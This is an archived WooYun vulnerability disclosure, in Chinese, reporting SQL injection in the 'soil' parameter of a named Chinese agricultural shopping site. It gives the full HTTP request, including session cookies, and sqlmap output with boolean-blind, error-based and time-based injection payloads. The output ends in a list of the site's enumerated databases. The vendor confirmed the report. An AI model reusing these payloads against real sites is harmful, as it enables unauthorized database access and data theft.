乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-24: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
0x01 漏洞位置北京士惠农业发展有限公司旗下 阿哥汇商城
http://www.agehui.com/
0x02 漏洞详细
xxoo.com//choose_seeds.php?city=0&district=0&land=1&pre_crop=0&province=0&season=2&soil=1
注入关键字为soil0x03 漏洞利用过程HTTP请求参数
GET /choose_seeds.php?city=0&district=0&land=1&pre_crop=0&province=0&season=2&soil=1 HTTP/1.1Cookie: PHPSESSID=viuri0k5crk82a5dgo4rb1rmu4; ECS[visit_times]=1; ECS[history]=146%2C63%2C135; ECS[display]=grid; ECSCP_ID=9a8de48510b04c377f9f0e415104dfaf6cc5b9b7; Hm_lvt_f929902d5e56ed2b36e9157395a27525=1447741382; Hm_lpvt_f929902d5e56ed2b36e9157395a27525=1447741382; HMACCOUNT=4DAB231F47901F3EHost: www.agehui.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
用sqlmap进行注入
0x04 测试结果
---Place: GETParameter: soil Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: city=0&district=0&land=1&pre_crop=0&province=0&season=2&soil=1) AND 9515=9515 AND (9748=9748 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: city=0&district=0&land=1&pre_crop=0&province=0&season=2&soil=1) AND (SELECT 9481 FROM(SELECT COUNT(*),CONCAT(0x7173697871,(SELECT (CASE WHEN (9481=9481) THEN 1 ELSE 0 END)),0x716b6d6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8859=8859 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: city=0&district=0&land=1&pre_crop=0&province=0&season=2&soil=1) AND SLEEP(5) AND (2610=2610---[17:00:46] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.28back-end DBMS: MySQL 5.0
available databases [11]:[*] agehui_db[*] agridb[*] aksexpert[*] es_2117[*] es_new[*] experts[*] information_schema[*] mysql[*] natesc[*] performance_schema[*] test
全部数据库可获得……网站大概开了防护策略,因此此时时间较长、审核人员注意测试过程……
交给工作人员吧
危害等级:高
漏洞Rank:15
确认时间:2015-11-24 18:03
感谢路人甲的关注
暂无